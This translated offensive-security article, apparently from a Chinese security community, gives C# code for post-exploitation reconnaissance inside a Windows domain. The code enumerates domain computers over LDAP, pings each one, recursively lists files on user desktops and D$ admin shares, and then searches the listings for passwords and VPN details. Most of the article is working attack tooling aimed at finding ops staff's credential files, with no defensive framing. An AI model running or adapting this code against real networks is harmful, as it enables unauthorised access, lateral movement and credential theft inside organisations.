Batch-collecting sensitive files inside a domain
This article was first published on the Xianzhi community: https://xz.aliyun.com/t/11667
Inside a domain, if we want to reach a specific machine and it happens to be a Linux box with only port 22 or so open, or it cannot be entered through the usual web foothold, we can look for the ops team's password book. Going through machines one by one costs too much, so we batch-collect desktop files from the domain machines instead.
0x01 Batch-collecting domain computer names
An automation tool should of course be fully automatic; it is a must-have for the lazy. net group "domain computers" /do lists machines three per row, and stripping the whitespace with a regex every time is a hassle, so fetching the machine names directly is more convenient.
The approach is to connect to LDAP and query with the filter (&(objectclass=computer)) to get the computer objects.
Getting the domain computers:
using System;
using System.DirectoryServices;

// Bind to the domain controller over LDAP with a domain account and
// return every object whose objectClass is computer.
public static DirectoryEntry coon = null;
public static DirectorySearcher search = null;

string url = "LDAP://" + ip;          // ip: domain controller address
string username = "domain user";      // placeholder: a domain account
string password = "domain pass";      // placeholder: that account's password
coon = new DirectoryEntry(url, username, password);
search = new DirectorySearcher(coon);
search.Filter = "(&(objectclass=computer))";   // the original was missing the closing quote
foreach (SearchResult r in search.FindAll())   // the original wrote Ldapcoon.search; `search` is the field above
{
    string computername = r.Properties["cn"][0].ToString();
    Console.WriteLine(computername);
}

0x02 Probing which machines are alive
1. Put the machines obtained above into machine.txt and read it line by line
// read one machine name per line from machine.txt
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    string machine = machine_name.ReadLine();
    Console.WriteLine(machine);
}
2. Probe liveness (this part came from a Google search)
using System;
using System.Net.NetworkInformation;
using System.Text;

// Returns true when the host answers a single ICMP echo within 800 ms.
public static bool IsMachineUp(string hostName)
{
    bool retVal = false;
    try
    {
        Ping pingSender = new Ping();
        PingOptions options = new PingOptions();
        // Use the default Ttl value which is 128,
        // but change the fragmentation behavior.
        options.DontFragment = true;
        // Create a buffer of 32 bytes of data to be transmitted.
        string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
        byte[] buffer = Encoding.ASCII.GetBytes(data);
        int timeout = 800;
        PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
        if (reply.Status == IPStatus.Success)
        {
            retVal = true;
        }
    }
    catch (Exception ex)
    {
        // name resolution or socket errors count as "down"
        retVal = false;
        //Console.ForegroundColor = ConsoleColor.Red;
        //Console.WriteLine("[-]" + ex.Message);
        //Console.ForegroundColor = ConsoleColor.White;
    }
    return retVal;
}
IT machines are generally workstations rather than servers and may be shut down after work. If most machines are off, a lot of time is wasted on them, so checking liveness first is well worth it.
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream)
{
    try
    {
        string machine = machine_name.ReadLine();
        if (IsMachineUp(machine))
        {
            // work on the live machine here
        }
    }
    catch { }
}
0x03 Collecting desktop files
The output directory we build here is laid out as follows:
TargetDesktopinfos
    Machine 1
        User A
            files
        User B
            files
    Machine 2
        User C
            files
        User D
            files
First get the current path and create the TargetDesktopinfos directory.
// output directory next to the executable
string currentpath = Directory.GetCurrentDirectory();
DesktopFiles = currentpath + "\\TargetDesktopinfos";
Directory.CreateDirectory(DesktopFiles);
Then get the target machine's c:\users\ directory through the admin share; if it exists, create a folder named after the machine.
string userpath = @"\\" + machine + @"\c$\users";
if (Directory.Exists(userpath))
{
    // enumerate after the existence check (the original enumerated first, which throws when the share is unreachable)
    var user_list = Directory.EnumerateDirectories(userpath);
    // folder named after the machine
    string MachineFolder = DesktopFiles + "\\" + machine;
    Directory.CreateDirectory(MachineFolder);
}
Then iterate over the users directory to find which users exist; likewise, if a desktop directory exists, create a folder named after the user and a desktop.txt inside it.
string userpath = @"\\" + machine + @"\c$\users";
if (Directory.Exists(userpath))
{
    var user_list = Directory.EnumerateDirectories(userpath);
    // folder named after the machine
    string MachineFolder = DesktopFiles + "\\" + machine;
    Directory.CreateDirectory(MachineFolder);
    foreach (string user in user_list)
    {
        string DesktopDirectoryPath = user + "\\desktop";
        // last path segment is the user name (the original called an unshown helper substring())
        string username = Path.GetFileName(user);
        if (Directory.Exists(DesktopDirectoryPath))
        {
            // folder named after the user
            string UserFolder = MachineFolder + "\\" + username;
            Directory.CreateDirectory(UserFolder);
            // desktop.txt receives the listing
            string Desktoptxt = UserFolder + "\\desktop.txt";
            StreamWriter sw = File.CreateText(Desktoptxt);
            sw.Close();
        }
    }
}
Next, enumerate every file in the desktop directory, including files inside its subfolders.
This uses the Directory.GetFileSystemEntries method:
public static string[] GetFileSystemEntries (string path, string searchPattern, System.IO.SearchOption searchOption);
First parameter, path: the directory to search.
Second parameter, searchPattern: the search string to match against the names of files and directories in `path`.
Third parameter, searchOption: one of the enumeration values specifying whether the search should include only the current directory or all subdirectories.
We use SearchOption.AllDirectories here, which includes the current directory and all of its subdirectories in the search.
The full code is as follows:
using System;
using System.IO;

// Collects a listing of every user's desktop on each live machine in machine.txt.
public static void Desktop()
{
    try
    {
        string DesktopFiles = "";
        // read machine names
        StreamReader machine_name = new StreamReader(@"machine.txt");
        while (!machine_name.EndOfStream)
        {
            try
            {
                string machine = machine_name.ReadLine();
                if (IsMachineUp(machine))
                {
                    // output directory under the current path
                    string currentpath = Directory.GetCurrentDirectory();
                    DesktopFiles = currentpath + "\\TargetDesktopinfos";
                    Directory.CreateDirectory(DesktopFiles);
                    Console.WriteLine("[*]" + machine);
                    // users directory on the target, reached through the C$ admin share
                    string userpath = @"\\" + machine + @"\c$\users";
                    if (Directory.Exists(userpath))
                    {
                        var user_list = Directory.EnumerateDirectories(userpath);
                        // folder named after the machine
                        string MachineFolder = DesktopFiles + "\\" + machine;
                        Directory.CreateDirectory(MachineFolder);
                        foreach (string user in user_list)
                        {
                            string DesktopDirectoryPath = user + "\\desktop";
                            // last path segment is the user name (the original called an unshown helper substring())
                            string username = Path.GetFileName(user);
                            if (Directory.Exists(DesktopDirectoryPath))
                            {
                                // folder named after the user
                                string UserFolder = MachineFolder + "\\" + username;
                                Directory.CreateDirectory(UserFolder);
                                // desktop.txt receives the listing
                                string Desktoptxt = UserFolder + "\\desktop.txt";
                                StreamWriter sw = File.CreateText(Desktoptxt);
                                sw.Close();
                                Console.ForegroundColor = ConsoleColor.Green;
                                Console.WriteLine("[*]" + username);
                                Console.ForegroundColor = ConsoleColor.White;
                                // every file and folder under the desktop, recursively
                                string[] AllFiles = Directory.GetFileSystemEntries(DesktopDirectoryPath, "*", SearchOption.AllDirectories);
                                foreach (string file in AllFiles)
                                {
                                    Console.WriteLine(file);
                                    string create_time = Directory.GetCreationTime(file).ToString();
                                    string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
                                    File.AppendAllText(Desktoptxt, writeFileTo);
                                }
                            }
                        }
                    }
                }
                else
                {
                    Console.ForegroundColor = ConsoleColor.Red;
                    Console.WriteLine("[-]" + machine + " is down");
                    Console.ForegroundColor = ConsoleColor.White;
                }
            }
            catch (System.Exception ex)
            {
                // an unreachable share or access denial skips this machine only
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] error");
                Console.WriteLine("[-] Exception: " + ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                continue;
            }
        }
        machine_name.Close();
        Console.WriteLine("[+]out put to:" + DesktopFiles);
    }
    catch (System.Exception ex)
    {
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("[-] error");
        Console.WriteLine("[-] Exception: " + ex.Message);
        Console.ForegroundColor = ConsoleColor.White;
        return;
    }
}
The D, E and F drives are collected the same way; D is used as the example here.
// Lists every file on the D$ share of each live machine in machine.txt.
public static void D()
{
    try
    {
        string DFiles = "";
        StreamReader machine_name = new StreamReader(@"machine.txt");
        while (!machine_name.EndOfStream)
        {
            try
            {
                string machine = machine_name.ReadLine();
                if (IsMachineUp(machine))
                {
                    string currentpath = Directory.GetCurrentDirectory();
                    DFiles = currentpath + "\\DInfos";
                    Directory.CreateDirectory(DFiles);
                    Console.ForegroundColor = ConsoleColor.Yellow;
                    Console.WriteLine("[*]" + machine);
                    Console.ForegroundColor = ConsoleColor.White;
                    // root of the D$ admin share; enumerating it throws when there is no D drive,
                    // which the outer catch below reports
                    string dpath = @"\\" + machine + @"\d$";
                    var d_list = Directory.EnumerateDirectories(dpath);
                    if (Directory.Exists(dpath))
                    {
                        // folder named after the machine
                        string MachineFolder = DFiles + "\\" + machine;
                        Directory.CreateDirectory(MachineFolder);
                        // output text file
                        string E_txt = MachineFolder + "\\dFiles.txt";
                        StreamWriter sw = File.CreateText(E_txt);
                        sw.Close();
                        try
                        {
                            // files directly in the drive root
                            var files = Directory.GetFiles(dpath);
                            foreach (string file in files)
                            {
                                Console.WriteLine(file);
                                string create_time = Directory.GetCreationTime(file).ToString();
                                string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
                                File.AppendAllText(E_txt, writeFileTo);
                            }
                            // then each top-level folder, recursively, skipping the system folder
                            var directorys = Directory.EnumerateDirectories(dpath);
                            foreach (string directory in directorys)
                            {
                                if (!directory.Contains("System Volume Information"))
                                {
                                    string[] AllFiles = Directory.GetFileSystemEntries(directory, "*", SearchOption.AllDirectories);
                                    foreach (string file in AllFiles)
                                    {
                                        string create_time = Directory.GetCreationTime(file).ToString();
                                        Console.WriteLine(file);
                                        string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
                                        File.AppendAllText(E_txt, writeFileTo);
                                    }
                                }
                            }
                        }
                        catch (UnauthorizedAccessException ex)
                        {
                            Console.ForegroundColor = ConsoleColor.Red;
                            Console.WriteLine(ex.Message);
                            Console.ForegroundColor = ConsoleColor.White;
                            //goto cc;
                        }
                    }
                }
            }
            catch (System.Exception ex)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[-] no D drive");
                Console.WriteLine(ex.Message);
                Console.ForegroundColor = ConsoleColor.White;
                continue;
            }
        }
        machine_name.Close();
        Console.WriteLine("[+]out put to:" + DFiles);
    }
    catch (System.Exception ex)
    {
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("[-] error");
        Console.WriteLine("[-] Exception: " + ex.Message);
        Console.ForegroundColor = ConsoleColor.White;
        return;
    }
}
Here we place some files on the desktop of domain machine ?8 for the test.
[Image: test run]
[Image: result listing]
Then simply search the output folder for keywords such as password or vpn.